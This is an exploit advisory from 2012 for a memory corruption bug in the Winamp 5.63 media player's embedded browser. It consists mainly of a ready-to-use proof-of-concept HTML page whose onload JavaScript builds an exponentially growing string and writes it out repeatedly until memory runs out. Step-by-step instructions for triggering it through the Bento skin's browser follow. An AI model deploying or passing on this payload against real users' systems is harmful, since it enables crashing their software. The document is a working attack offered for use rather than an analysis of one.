=============================================== Winamp Browser Memory Corruption Vulnerability =============================================== :-----------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Winamp Browser Memory Corruption Vulnerability : # Date : 13 Agustus 2012 : # Author : X-Cisadane : # Software Link : http://www.winamp.com/media-player/all : # My Version : 5.63 : # Version : ALL Versions : # Category : Desktop (Windows) Applications : # Platform : Win32 : # Vulnerability : Memory Corruption Vulnerability : # Tested On : Microsoft Windows XP SP 3 En-Us 32 Bit : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari :-----------------------------------------------------------------------------------------------------------------------: Proof of Concept ================ 1. Copy this script into notepad/your favorite text editor : <body onload="javascript:kali_cisadane();"></body> <script>function kali_cisadane(){var X="\x5c\x78\x34\x32";for(i=0;i<999999999;i++){X+=X+"\x5c\x78\x34\x32";document.write(+X+X);}}</script> 2. Save File Name as 0wn.html (For Example). 3. Open Winamp with Bento Skin & Click Browser. Fill with your 0wn.html location In the URL Bar.\ PIC : http://i50.tinypic.com/ush0j.png